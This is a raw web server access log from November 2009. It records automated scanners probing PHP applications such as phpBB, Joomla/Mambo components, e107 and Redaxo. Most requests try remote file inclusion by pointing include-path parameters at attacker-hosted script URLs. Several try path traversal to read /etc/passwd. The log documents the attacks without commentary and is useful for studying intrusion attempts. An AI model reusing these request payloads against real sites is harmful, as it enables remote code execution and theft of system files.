117.58.251.130 - - [11/Nov/2009:23:19:37 -0600] "GET /index.php?kobr=./../../../../../../../../etc/passwd HTTP/1.1" 404 292 "-""-"
65.55.207.72 - - [11/Nov/2009:23:19:55 -0600] "GET /logs/access_log.1182297600 HTTP/1.1" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
69.64.75.54 - - [11/Nov/2009:23:20:20 -0600] "GET /logs/access_log.1232582400/functions.php?phpbb_root_path=http://pastie.org/661597.txt? HTTP/1.1" 404 323 "-""Mozilla/5.0"
69.64.75.54 - - [11/Nov/2009:23:20:20 -0600] "GET /logs/functions.php?phpbb_root_path=http://pastie.org/661597.txt? HTTP/1.1" 404 301 "-""Mozilla/5.0"
69.64.75.54 - - [11/Nov/2009:23:20:20 -0600] "GET /functions.php?phpbb_root_path=http://pastie.org/661597.txt? HTTP/1.1" 404 296 "-""Mozilla/5.0"
74.86.17.106 - - [11/Nov/2009:23:20:22 -0600] "GET /logs/accounts/inc/include.php?language=0&lang_settings[0][1]=http://www.qqe.ru/forum/avatars/id1.txt? HTTP/1.1" 404 312 "-""Mozilla/5.0"
74.86.17.106 - - [11/Nov/2009:23:20:22 -0600] "GET /logs/access_log.1239494400/accounts/inc/include.php?language=0&lang_settings[0][1]=http://www.qqe.ru/forum/avatars/id1.txt? HTTP/1.1" 404 334 "-""Mozilla/5.0"
74.86.17.106 - - [11/Nov/2009:23:20:22 -0600] "GET /accounts/inc/include.php?language=0&lang_settings[0][1]=http://www.qqe.ru/forum/avatars/id1.txt? HTTP/1.1" 404 307 "-""Mozilla/5.0"
69.64.75.54 - - [11/Nov/2009:23:20:26 -0600] "GET /logs/access_log.1240444800/functions.php?phpbb_root_path=http://pastie.org/661597.txt? HTTP/1.1" 404 323 "-""Mozilla/5.0"
65.55.106.211 - - [11/Nov/2009:23:21:26 -0600] "GET /logs/access_log.1131408000 HTTP/1.1" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
74.86.17.106 - - [11/Nov/2009:23:22:44 -0600] "GET /accounts/inc/include.php?language=0&lang_settings[0][1]=http://www.qqe.ru/forum/avatars/id1.txt? HTTP/1.1" 404 307 "-""Mozilla/5.0"
74.86.17.106 - - [11/Nov/2009:23:22:50 -0600] "GET /logs/accounts/inc/include.php?language=0&lang_settings[0][1]=http://www.qqe.ru/forum/avatars/id1.txt? HTTP/1.1" 404 312 "-""Mozilla/5.0"
74.86.17.106 - - [11/Nov/2009:23:22:50 -0600] "GET /logs/access_log.1239494400/accounts/inc/include.php?language=0&lang_settings[0][1]=http://www.qqe.ru/forum/avatars/id1.txt? HTTP/1.1" 404 334 "-""Mozilla/5.0"
74.86.17.106 - - [11/Nov/2009:23:22:50 -0600] "GET /logs/access_log.1237075200/accounts/inc/include.php?language=0&lang_settings[0][1]=http://www.qqe.ru/forum/avatars/id1.txt? HTTP/1.1" 404 334 "-""Mozilla/5.0"
74.86.17.106 - - [11/Nov/2009:23:23:51 -0600] "GET /?sourcedir=http://www.qqe.ru/forum/avatars/id1.txt? HTTP/1.1" 200 3245 "-""Mozilla/5.0"
74.86.17.106 - - [11/Nov/2009:23:23:51 -0600] "GET /logs/access_log.1244937600/?sourcedir=http://www.qqe.ru/forum/avatars/id1.txt? HTTP/1.1" 404 310 "-""Mozilla/5.0"
74.86.17.106 - - [11/Nov/2009:23:23:51 -0600] "GET /logs/access_log.1247184000/?sourcedir=http://www.qqe.ru/forum/avatars/id1.txt? HTTP/1.1" 404 310 "-""Mozilla/5.0"
74.86.17.106 - - [11/Nov/2009:23:23:52 -0600] "GET /logs/?sourcedir=http://www.qqe.ru/forum/avatars/id1.txt? HTTP/1.1" 200 212466 "-""Mozilla/5.0"
67.227.134.140 - - [11/Nov/2009:23:23:56 -0600] "GET /logs//skin/ggambo6200_board/setup.php?dir=http://www.tioplus.com/zeroboard/x1.gif??? HTTP/1.1" 404 320 "-""Mozilla/5.0"
67.227.134.140 - - [11/Nov/2009:23:23:56 -0600] "GET //skin/ggambo6200_board/setup.php?dir=http://www.tioplus.com/zeroboard/x1.gif??? HTTP/1.1" 404 315 "-""Mozilla/5.0"
67.227.134.140 - - [11/Nov/2009:23:23:56 -0600] "GET /logs/access_log.1249171200//skin/ggambo6200_board/setup.php?dir=http://www.tioplus.com/zeroboard/x1.gif??? HTTP/1.1" 404 342 "-""Mozilla/5.0"
74.86.17.106 - - [11/Nov/2009:23:24:06 -0600] "GET /?sourcedir=http://www.qqe.ru/forum/avatars/id1.txt? HTTP/1.1" 200 3245 "-""Mozilla/5.0"
74.86.17.106 - - [11/Nov/2009:23:24:06 -0600] "GET /logs/access_log.1247184000/?sourcedir=http://www.qqe.ru/forum/avatars/id1.txt? HTTP/1.1" 404 310 "-""Mozilla/5.0"
74.86.17.106 - - [11/Nov/2009:23:24:06 -0600] "GET /logs/access_log.1244937600/?sourcedir=http://www.qqe.ru/forum/avatars/id1.txt? HTTP/1.1" 404 310 "-""Mozilla/5.0"
74.86.17.106 - - [11/Nov/2009:23:24:09 -0600] "GET /logs/?sourcedir=http://www.qqe.ru/forum/avatars/id1.txt? HTTP/1.1" 200 212466 "-""Mozilla/5.0"
216.245.220.82 - - [11/Nov/2009:23:24:43 -0600] "GET /logs/access_log.1243036800/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://pastie.org/661597.txt?? HTTP/1.1" 404 326 "-""Mozilla/5.0"
216.245.220.82 - - [11/Nov/2009:23:24:43 -0600] "GET /logs/access_log.1236038400/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://pastie.org/661597.txt?? HTTP/1.1" 404 326 "-""Mozilla/5.0"
72.55.165.80 - - [11/Nov/2009:23:24:55 -0600] "GET /logs//modules/TotalCalendar/about.php?inc_dir=http://95.70.104.73/id.txt???? HTTP/1.1" 404 320 "-""libwww-perl/5.805"
72.55.165.80 - - [11/Nov/2009:23:24:55 -0600] "GET //modules/TotalCalendar/about.php?inc_dir=http://95.70.104.73/id.txt???? HTTP/1.1" 404 315 "-""libwww-perl/5.805"
116.127.121.116 - - [11/Nov/2009:23:25:30 -0600] "GET //admin.php?include_path=http://denie.fileave.com/fx29id1.txt??? HTTP/1.1" 404 293 "-""Mozilla/5.0"
116.127.121.116 - - [11/Nov/2009:23:25:30 -0600] "GET /logs//admin.php?include_path=http://denie.fileave.com/fx29id1.txt??? HTTP/1.1" 404 298 "-""Mozilla/5.0"
116.127.121.116 - - [11/Nov/2009:23:25:30 -0600] "GET /logs/access_log.1251158400//admin.php?include_path=http://denie.fileave.com/fx29id1.txt??? HTTP/1.1" 404 320 "-""Mozilla/5.0"
116.127.121.116 - - [11/Nov/2009:23:25:43 -0600] "GET /logs/access_log.1250985600//admin.php?include_path=http://denie.fileave.com/fx29id1.txt??? HTTP/1.1" 404 320 "-""Mozilla/5.0"
91.137.0.63 - - [11/Nov/2009:23:34:49 -0600] "GET /logs//include/admin.lib.inc.php?site_path=http://www.nopaste.pl/Source/hbb.txt?&mode=id HTTP/1.1" 404 314 "-""-"
65.55.207.95 - - [11/Nov/2009:23:39:55 -0600] "GET /logs/access_log.1246406400 HTTP/1.1" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
65.60.11.122 - - [11/Nov/2009:23:41:19 -0600] "GET //admin/classes/TplLoad.php?full_path_to_public_program=http://202.111.158.169/id.php?? HTTP/1.1" 404 309 "-""libwww-perl/5.805"
65.60.11.122 - - [11/Nov/2009:23:41:19 -0600] "GET /logs//admin/classes/TplLoad.php?full_path_to_public_program=http://202.111.158.169/id.php?? HTTP/1.1" 404 314 "-""libwww-perl/5.805"
69.64.75.54 - - [11/Nov/2009:23:41:21 -0600] "GET /logs/access_log.1248566400/phpbb3.functions.php?pConfig_auth[phpbb_path]=http://pastie.org/661597.txt? HTTP/1.1" 404 330 "-""Mozilla/5.0"
69.64.75.54 - - [11/Nov/2009:23:41:21 -0600] "GET /logs/phpbb3.functions.php?pConfig_auth[phpbb_path]=http://pastie.org/661597.txt? HTTP/1.1" 404 308 "-""Mozilla/5.0"
69.64.75.54 - - [11/Nov/2009:23:41:21 -0600] "GET /phpbb3.functions.php?pConfig_auth[phpbb_path]=http://pastie.org/661597.txt? HTTP/1.1" 404 303 "-""Mozilla/5.0"
69.64.75.54 - - [11/Nov/2009:23:41:22 -0600] "GET /logs/access_log.1247702400/phpbb3.functions.php?pConfig_auth[phpbb_path]=http://pastie.org/661597.txt? HTTP/1.1" 404 330 "-""Mozilla/5.0"
216.245.220.82 - - [11/Nov/2009:23:42:40 -0600] "GET /logs/lostpasswd.php?env%5Binclude_prefix%5D=http://pastie.org/661597.txt?? HTTP/1.1" 404 302 "-""Mozilla/5.0"
216.245.220.82 - - [11/Nov/2009:23:42:40 -0600] "GET /logs/access_log.1235952000/lostpasswd.php?env%5Binclude_prefix%5D=http://pastie.org/661597.txt?? HTTP/1.1" 404 324 "-""Mozilla/5.0"
216.245.220.82 - - [11/Nov/2009:23:42:40 -0600] "GET /logs/access_log.1230768000/lostpasswd.php?env%5Binclude_prefix%5D=http://pastie.org/661597.txt?? HTTP/1.1" 404 324 "-""Mozilla/5.0"
216.245.220.82 - - [11/Nov/2009:23:42:40 -0600] "GET /lostpasswd.php?env%5Binclude_prefix%5D=http://pastie.org/661597.txt?? HTTP/1.1" 404 297 "-""Mozilla/5.0"
62.141.47.10 - - [11/Nov/2009:23:44:19 -0600] "GET /logs/modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://users.rcn.com/t.goss/pid.txt??? HTTP/1.1" 404 323 "-""Mozilla/5.0"
62.141.47.10 - - [11/Nov/2009:23:44:19 -0600] "GET /modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://users.rcn.com/t.goss/pid.txt??? HTTP/1.1" 404 318 "-""Mozilla/5.0"
62.141.47.10 - - [11/Nov/2009:23:44:21 -0600] "GET /logs/access_log.1239753600/modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://users.rcn.com/t.goss/pid.txt??? HTTP/1.1" 404 345 "-""Mozilla/5.0"
65.55.106.229 - - [11/Nov/2009:23:44:25 -0600] "GET /logs/access_log.1177027200 HTTP/1.1" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
62.141.47.10 - - [11/Nov/2009:23:45:09 -0600] "GET /logs/access_log.1245110400/modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://users.rcn.com/t.goss/pid.txt??? HTTP/1.1" 404 345 "-""Mozilla/5.0"
64.8.105.21 - - [11/Nov/2009:23:46:04 -0600] "GET /logs//themes/default/index.php?main=http://www.atdreamholiday.com//smf/Themes/.safe?? HTTP/1.1" 404 313 "-""libwww-perl/5.79"
64.8.105.21 - - [11/Nov/2009:23:46:04 -0600] "GET /logs/access_log.1246752000//themes/default/index.php?main=http://www.atdreamholiday.com//smf/Themes/.safe?? HTTP/1.1" 404 335 "-""libwww-perl/5.79"
64.8.105.21 - - [11/Nov/2009:23:46:04 -0600] "GET //themes/default/index.php?main=http://www.atdreamholiday.com//smf/Themes/.safe?? HTTP/1.1" 404 308 "-""libwww-perl/5.79"
64.8.105.21 - - [11/Nov/2009:23:46:39 -0600] "GET /logs/access_log.1253577600//themes/default/index.php?main=http://www.atdreamholiday.com//smf/Themes/.safe?? HTTP/1.1" 404 335 "-""libwww-perl/5.79"
64.8.105.21 - - [11/Nov/2009:23:46:46 -0600] "GET /logs/access_log.1243036800//themes/default/index.php?main=http://www.atdreamholiday.com//smf/Themes/.safe?? HTTP/1.1" 404 335 "-""libwww-perl/5.79"
64.8.105.21 - - [11/Nov/2009:23:46:57 -0600] "GET /logs/access_log.1246838400//themes/default/index.php?main=http://www.atdreamholiday.com//smf/Themes/.safe?? HTTP/1.1" 404 335 "-""libwww-perl/5.79"
69.64.75.54 - - [11/Nov/2009:23:48:50 -0600] "GET /logs/get_events.php?includedir=http://pastie.org/661597.txt? HTTP/1.1" 404 302 "-""Mozilla/5.0"
69.64.75.54 - - [11/Nov/2009:23:48:50 -0600] "GET /logs/access_log.1243814400/get_events.php?includedir=http://pastie.org/661597.txt? HTTP/1.1" 404 324 "-""Mozilla/5.0"
69.64.75.54 - - [11/Nov/2009:23:48:50 -0600] "GET /get_events.php?includedir=http://pastie.org/661597.txt? HTTP/1.1" 404 297 "-""Mozilla/5.0"
69.64.75.54 - - [11/Nov/2009:23:48:50 -0600] "GET /logs/access_log.1247097600/get_events.php?includedir=http://pastie.org/661597.txt? HTTP/1.1" 404 324 "-""Mozilla/5.0"
66.163.197.88 - - [11/Nov/2009:23:48:53 -0600] "GET //ashnews.php?pathtoashnews=http://www.vip-united.de///redaxo/include/addons/one.txt? HTTP/1.1" 404 295 "-""Mozilla/5.0"
66.163.197.88 - - [11/Nov/2009:23:48:53 -0600] "GET /logs/access_log.1251936000//ashnews.php?pathtoashnews=http://www.vip-united.de///redaxo/include/addons/one.txt? HTTP/1.1" 404 322 "-""Mozilla/5.0"
66.163.197.88 - - [11/Nov/2009:23:48:53 -0600] "GET /logs//ashnews.php?pathtoashnews=http://www.vip-united.de///redaxo/include/addons/one.txt? HTTP/1.1" 404 300 "-""Mozilla/5.0"
66.163.197.88 - - [11/Nov/2009:23:49:33 -0600] "GET /logs/access_log.1242086400//ashnews.php?pathtoashnews=http://www.vip-united.de///redaxo/include/addons/one.txt? HTTP/1.1" 404 322 "-""Mozilla/5.0"
65.60.11.122 - - [11/Nov/2009:23:50:03 -0600] "GET /logs//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://202.111.158.169/id.php?? HTTP/1.1" 404 332 "-""libwww-perl/5.805"
65.60.11.122 - - [11/Nov/2009:23:50:03 -0600] "GET //components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://202.111.158.169/id.php?? HTTP/1.1" 404 327 "-""libwww-perl/5.805"
62.141.47.10 - - [11/Nov/2009:23:50:16 -0600] "GET /logs/access_log.1234137600/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://users.rcn.com/t.goss/pid.txt??? HTTP/1.1" 404 346 "-""Mozilla/5.0"
62.141.47.10 - - [11/Nov/2009:23:50:49 -0600] "GET /logs/access_log.1235865600/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://users.rcn.com/t.goss/pid.txt??? HTTP/1.1" 404 346 "-""Mozilla/5.0"
209.92.156.53 - - [11/Nov/2009:23:55:23 -0600] "GET //e107/e107_handlers/secure_img_render.php?p=http://hasslefreetours.co.za/wp-content/uploads/2008/01/idxx.txt?? HTTP/1.1" 404 324 "-""Mozilla/5.0"
209.92.156.53 - - [11/Nov/2009:23:55:23 -0600] "GET /logs//e107/e107_handlers/secure_img_render.php?p=http://hasslefreetours.co.za/wp-content/uploads/2008/01/idxx.txt?? HTTP/1.1" 404 329 "-""Mozilla/5.0"
209.92.156.53 - - [11/Nov/2009:23:55:23 -0600] "GET /logs/access_log.1246320000//e107/e107_handlers/secure_img_render.php?p=http://hasslefreetours.co.za/wp-content/uploads/2008/01/idxx.txt?? HTTP/1.1" 404 351 "-""Mozilla/5.0"
209.92.156.53 - - [11/Nov/2009:23:55:23 -0600] "GET /logs/access_log.1242864000//e107/e107_handlers/secure_img_render.php?p=http://hasslefreetours.co.za/wp-content/uploads/2008/01/idxx.txt?? HTTP/1.1" 404 351 "-""Mozilla/5.0"
216.199.232.112 - - [11/Nov/2009:23:56:46 -0600] "GET //phorum/plugin/replace/plugin.php?PHORUM[settings_dir]=http://koryochemical.co.kr/board/download/data//fx29id.txt??? HTTP/1.1" 404 316 "-""Mozilla/5.0"
216.199.232.112 - - [11/Nov/2009:23:56:46 -0600] "GET /logs//phorum/plugin/replace/plugin.php?PHORUM[settings_dir]=http://koryochemical.co.kr/board/download/data//fx29id.txt??? HTTP/1.1" 404 321 "-""Mozilla/5.0"
216.199.232.112 - - [11/Nov/2009:23:56:46 -0600] "GET /logs/access_log.1247443200//phorum/plugin/replace/plugin.php?PHORUM[settings_dir]=http://koryochemical.co.kr/board/download/data//fx29id.txt??? HTTP/1.1" 404 343 "-""Mozilla/5.0"
216.199.232.112 - - [11/Nov/2009:23:56:51 -0600] "GET /logs/access_log.1241308800//phorum/plugin/replace/plugin.php?PHORUM[settings_dir]=http://koryochemical.co.kr/board/download/data//fx29id.txt??? HTTP/1.1" 404 343 "-""Mozilla/5.0"
216.199.232.112 - - [11/Nov/2009:23:57:16 -0600] "GET /logs//phorum/plugin/replace/plugin.php?PHORUM[settings_dir]=http://koryochemical.co.kr/board/download/data//fx29id.txt??? HTTP/1.1" 404 321 "-""Mozilla/5.0"
216.199.232.112 - - [11/Nov/2009:23:57:16 -0600] "GET //phorum/plugin/replace/plugin.php?PHORUM[settings_dir]=http://koryochemical.co.kr/board/download/data//fx29id.txt??? HTTP/1.1" 404 316 "-""Mozilla/5.0"
216.199.232.112 - - [11/Nov/2009:23:57:16 -0600] "GET /logs/access_log.1247443200//phorum/plugin/replace/plugin.php?PHORUM[settings_dir]=http://koryochemical.co.kr/board/download/data//fx29id.txt??? HTTP/1.1" 404 343 "-""Mozilla/5.0"
216.199.232.112 - - [11/Nov/2009:23:57:21 -0600] "GET /logs/access_log.1241308800//phorum/plugin/replace/plugin.php?PHORUM[settings_dir]=http://koryochemical.co.kr/board/download/data//fx29id.txt??? HTTP/1.1" 404 343 "-""Mozilla/5.0"
65.55.207.136 - - [11/Nov/2009:23:57:25 -0600] "GET /logs/access_log.1157846400 HTTP/1.1" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
62.141.47.10 - - [11/Nov/2009:23:57:46 -0600] "GET /logs/access_log.1245456000/?sourcedir=http://users.rcn.com/t.goss/pid.txt??? HTTP/1.1" 404 310 "-""Mozilla/5.0"
62.141.47.10 - - [11/Nov/2009:23:57:46 -0600] "GET /?sourcedir=http://users.rcn.com/t.goss/pid.txt??? HTTP/1.1" 200 3245 "-""Mozilla/5.0"
62.141.47.10 - - [11/Nov/2009:23:57:48 -0600] "GET /logs/?sourcedir=http://users.rcn.com/t.goss/pid.txt??? HTTP/1.1" 200 212466 "-""Mozilla/5.0"
91.121.28.22 - - [11/Nov/2009:23:57:53 -0600] "GET /logs/access_log.1244937600/?sourcedir=http://users.rcn.com/t.goss/pid.txt??? HTTP/1.1" 404 310 "-""Mozilla/5.0"
91.121.28.22 - - [11/Nov/2009:23:57:53 -0600] "GET /?sourcedir=http://users.rcn.com/t.goss/pid.txt??? HTTP/1.1" 200 3245 "-""Mozilla/5.0"
91.121.28.22 - - [11/Nov/2009:23:57:54 -0600] "GET /logs/?sourcedir=http://users.rcn.com/t.goss/pid.txt??? HTTP/1.1" 200 212466 "-""Mozilla/5.0"
62.141.47.10 - - [11/Nov/2009:23:58:06 -0600] "GET /?sourcedir=http://users.rcn.com/t.goss/pid.txt??? HTTP/1.1" 200 3245 "-""Mozilla/5.0"
62.141.47.10 - - [11/Nov/2009:23:58:07 -0600] "GET /logs/access_log.1244937600/?sourcedir=http://users.rcn.com/t.goss/pid.txt??? HTTP/1.1" 404 310 "-""Mozilla/5.0"
62.141.47.10 - - [11/Nov/2009:23:58:09 -0600] "GET /logs/?sourcedir=http://users.rcn.com/t.goss/pid.txt??? HTTP/1.1" 200 212466 "-""Mozilla/5.0"
91.121.28.22 - - [11/Nov/2009:23:58:27 -0600] "GET /?sourcedir=http://users.rcn.com/t.goss/pid.txt??? HTTP/1.1" 200 3245 "-""Mozilla/5.0"
91.121.28.22 - - [11/Nov/2009:23:58:27 -0600] "GET /logs/access_log.1243468800/?sourcedir=http://users.rcn.com/t.goss/pid.txt??? HTTP/1.1" 404 310 "-""Mozilla/5.0"
91.121.28.22 - - [11/Nov/2009:23:58:27 -0600] "GET /logs/access_log.1244678400/?sourcedir=http://users.rcn.com/t.goss/pid.txt??? HTTP/1.1" 404 310 "-""Mozilla/5.0"
91.121.28.22 - - [11/Nov/2009:23:58:28 -0600] "GET /logs/?sourcedir=http://users.rcn.com/t.goss/pid.txt??? HTTP/1.1" 200 212466 "-""Mozilla/5.0"
91.121.28.22 - - [11/Nov/2009:23:58:32 -0600] "GET /logs/access_log.1247184000/?sourcedir=http://users.rcn.com/t.goss/pid.txt??? HTTP/1.1" 404 310 "-""Mozilla/5.0"
62.141.47.10 - - [11/Nov/2009:23:58:39 -0600] "GET /logs/access_log.1244937600/?sourcedir=http://users.rcn.com/t.goss/pid.txt??? HTTP/1.1" 404 310 "-""Mozilla/5.0"
62.141.47.10 - - [11/Nov/2009:23:58:44 -0600] "GET /logs/access_log.1247184000/?sourcedir=http://users.rcn.com/t.goss/pid.txt??? HTTP/1.1" 404 310 "-""Mozilla/5.0"
65.55.106.160 - - [11/Nov/2009:23:58:55 -0600] "GET /logs/access_log.1138838400 HTTP/1.1" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
66.163.197.88 - - [12/Nov/2009:00:01:55 -0600] "GET //newspublish/include.php?path%5Bdocroot%5D=http://www.vip-united.de///redaxo/include/addons/one.txt? HTTP/1.1" 404 307 "-""Mozilla/5.0"
66.163.197.88 - - [12/Nov/2009:00:01:55 -0600] "GET /logs//newspublish/include.php?path%5Bdocroot%5D=http://www.vip-united.de///redaxo/include/addons/one.txt? HTTP/1.1" 404 312 "-""Mozilla/5.0"
66.163.197.88 - - [12/Nov/2009:00:01:55 -0600] "GET /logs/access_log.1239408000//newspublish/include.php?path%5Bdocroot%5D=http://www.vip-united.de///redaxo/include/addons/one.txt? HTTP/1.1" 404 334 "-""Mozilla/5.0"
66.163.197.88 - - [12/Nov/2009:00:01:56 -0600] "GET /logs/access_log.1246492800//newspublish/include.php?path%5Bdocroot%5D=http://www.vip-united.de///redaxo/include/addons/one.txt? HTTP/1.1" 404 334 "-""Mozilla/5.0"
69.64.75.54 - - [12/Nov/2009:00:03:29 -0600] "GET /logs///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://pastie.org/661597.txt? HTTP/1.1" 404 361 "-""Mozilla/5.0"
69.64.75.54 - - [12/Nov/2009:00:03:29 -0600] "GET ///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://pastie.org/661597.txt? HTTP/1.1" 404 356 "-""Mozilla/5.0"
69.64.75.54 - - [12/Nov/2009:00:03:29 -0600] "GET /logs/access_log.1234828800///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://pastie.org/661597.txt? HTTP/1.1" 404 383 "-""Mozilla/5.0"
69.64.75.54 - - [12/Nov/2009:00:03:46 -0600] "GET /logs/access_log.1239753600///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://pastie.org/661597.txt? HTTP/1.1" 404 383 "-""Mozilla/5.0"
91.192.20.164 - - [12/Nov/2009:00:03:58 -0600] "GET /logs/access_log.1249171200/skin/gallery/login.php?dir=http://econ1.nida.ac.th/review/view1.txt??? HTTP/1.1" 404 332 "-""Mozilla/5.0"
91.192.20.164 - - [12/Nov/2009:00:03:58 -0600] "GET /skin/gallery/login.php?dir=http://econ1.nida.ac.th/review/view1.txt??? HTTP/1.1" 404 305 "-""Mozilla/5.0"
91.192.20.164 - - [12/Nov/2009:00:03:58 -0600] "GET /logs/skin/gallery/login.php?dir=http://econ1.nida.ac.th/review/view1.txt??? HTTP/1.1" 404 310 "-""Mozilla/5.0"
65.60.11.122 - - [12/Nov/2009:00:06:46 -0600] "GET /logs//index.php?option=com_mambatstaff&Itemid=&mosConfig_absolute_path=http://202.111.158.169/id.php?? HTTP/1.1" 404 298 "-""libwww-perl/5.805"
65.60.11.122 - - [12/Nov/2009:00:06:46 -0600] "GET //index.php?option=com_mambatstaff&Itemid=&mosConfig_absolute_path=http://202.111.158.169/id.php?? HTTP/1.1" 404 293 "-""libwww-perl/5.805"
65.60.11.122 - - [12/Nov/2009:00:07:16 -0600] "GET //index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://202.111.158.169/id.php?? HTTP/1.1" 404 293 "-""libwww-perl/5.805"
65.60.11.122 - - [12/Nov/2009:00:07:16 -0600] "GET /logs//index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://202.111.158.169/id.php?? HTTP/1.1" 404 298 "-""libwww-perl/5.805"
116.127.121.116 - - [12/Nov/2009:00:08:19 -0600] "GET /logs/access_log.1253491200//common/db.php?commonpath=http://denie.fileave.com/fx29id1.txt??? HTTP/1.1" 404 324 "-""Mozilla/5.0"
116.127.121.116 - - [12/Nov/2009:00:08:19 -0600] "GET //common/db.php?commonpath=http://denie.fileave.com/fx29id1.txt??? HTTP/1.1" 404 297 "-""Mozilla/5.0"
116.127.121.116 - - [12/Nov/2009:00:08:19 -0600] "GET /logs//common/db.php?commonpath=http://denie.fileave.com/fx29id1.txt??? HTTP/1.1" 404 302 "-""Mozilla/5.0"
205.209.53.68 - - [12/Nov/2009:00:08:19 -0600] "GET /?sourcedir=http://indo.home.ro/idv6.txt??? HTTP/1.1" 200 3245 "-""libwww-perl/5.805"
205.209.53.68 - - [12/Nov/2009:00:08:20 -0600] "GET /logs/?sourcedir=http://indo.home.ro/idv6.txt??? HTTP/1.1" 200 212466 "-""libwww-perl/5.805"
212.108.197.244 - - [12/Nov/2009:00:08:40 -0600] "GET /mcf.php?content=./../../../../../../../../etc/passwd%00 HTTP/1.1" 404 290 "-""-"
212.108.197.244 - - [12/Nov/2009:00:08:40 -0600] "GET /mcf.php?content=./../../../../../../../../etc/passwd HTTP/1.1" 404 290 "-""-"
174.123.165.226 - - [12/Nov/2009:00:08:48 -0600] "GET /main.php?sayfa=./../../../../../../../../etc/passwd%00 HTTP/1.1" 404 291 "-""-"
174.123.165.226 - - [12/Nov/2009:00:08:48 -0600] "GET /main.php?sayfa=./../../../../../../../../etc/passwd HTTP/1.1" 404 291 "-""-"
115.124.102.10 - - [12/Nov/2009:00:08:50 -0600] "GET /logs/?sourcedir=http://indo.home.ro/license???? HTTP/1.1" 200 212466 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6"
115.124.102.10 - - [12/Nov/2009:00:08:50 -0600] "GET /?sourcedir=http://indo.home.ro/license???? HTTP/1.1" 200 3245 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6"
65.60.11.122 - - [12/Nov/2009:00:09:49 -0600] "GET //index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://202.111.158.169/id.php?? HTTP/1.1" 404 293 "-""libwww-perl/5.805"
65.60.11.122 - - [12/Nov/2009:00:09:49 -0600] "GET /logs//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://202.111.158.169/id.php?? HTTP/1.1" 404 298 "-""libwww-perl/5.805"
65.55.106.107 - - [12/Nov/2009:00:11:25 -0600] "GET /logs/access_log.1196812800 HTTP/1.1" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
205.209.53.68 - - [12/Nov/2009:00:11:50 -0600] "GET /logs/home.php?index=http://indo.home.ro/idv6.txt??? HTTP/1.1" 404 296 "-""libwww-perl/5.805"
205.209.53.68 - - [12/Nov/2009:00:11:50 -0600] "GET /home.php?index=http://indo.home.ro/idv6.txt??? HTTP/1.1" 404 291 "-""libwww-perl/5.805"
205.209.53.68 - - [12/Nov/2009:00:11:54 -0600] "GET /home.php?index=http://indo.home.ro/idv6.txt??? HTTP/1.1" 404 291 "-""libwww-perl/5.805"
205.209.53.68 - - [12/Nov/2009:00:11:54 -0600] "GET /logs/home.php?index=http://indo.home.ro/idv6.txt??? HTTP/1.1" 404 296 "-""libwww-perl/5.805"
216.199.232.112 - - [12/Nov/2009:00:12:02 -0600] "GET //redaxo/include/addons/import_export/pages/index.inc.php?REX[INCLUDE_PATH]=http://koryochemical.co.kr/board/download/data//fx29id.txt??? HTTP/1.1" 404 339 "-""Mozilla/5.0"
216.199.232.112 - - [12/Nov/2009:00:12:02 -0600] "GET /logs//redaxo/include/addons/import_export/pages/index.inc.php?REX[INCLUDE_PATH]=http://koryochemical.co.kr/board/download/data//fx29id.txt??? HTTP/1.1" 404 344 "-""Mozilla/5.0"
216.199.232.112 - - [12/Nov/2009:00:12:02 -0600] "GET /logs/access_log.1242172800//redaxo/include/addons/import_export/pages/index.inc.php?REX[INCLUDE_PATH]=http://koryochemical.co.kr/board/download/data//fx29id.txt??? HTTP/1.1" 404 366 "-""Mozilla/5.0"
216.199.232.112 - - [12/Nov/2009:00:12:07 -0600] "GET //redaxo/include/addons/import_export/pages/index.inc.php?REX[INCLUDE_PATH]=http://koryochemical.co.kr/board/download/data//fx29id.txt??? HTTP/1.1" 404 339 "-""Mozilla/5.0"
216.199.232.112 - - [12/Nov/2009:00:12:07 -0600] "GET /logs//redaxo/include/addons/import_export/pages/index.inc.php?REX[INCLUDE_PATH]=http://koryochemical.co.kr/board/download/data//fx29id.txt??? HTTP/1.1" 404 344 "-""Mozilla/5.0"
216.199.232.112 - - [12/Nov/2009:00:12:07 -0600] "GET /logs/access_log.1242172800//redaxo/include/addons/import_export/pages/index.inc.php?REX[INCLUDE_PATH]=http://koryochemical.co.kr/board/download/data//fx29id.txt??? HTTP/1.1" 404 366 "-""Mozilla/5.0"
212.108.197.244 - - [12/Nov/2009:00:12:23 -0600] "GET /logs/mcf.php?content=./../../../../../../../../etc/passwd%00 HTTP/1.1" 404 295 "-""-"
212.108.197.244 - - [12/Nov/2009:00:12:23 -0600] "GET /logs/mcf.php?content=./../../../../../../../../etc/passwd HTTP/1.1" 404 295 "-""-"
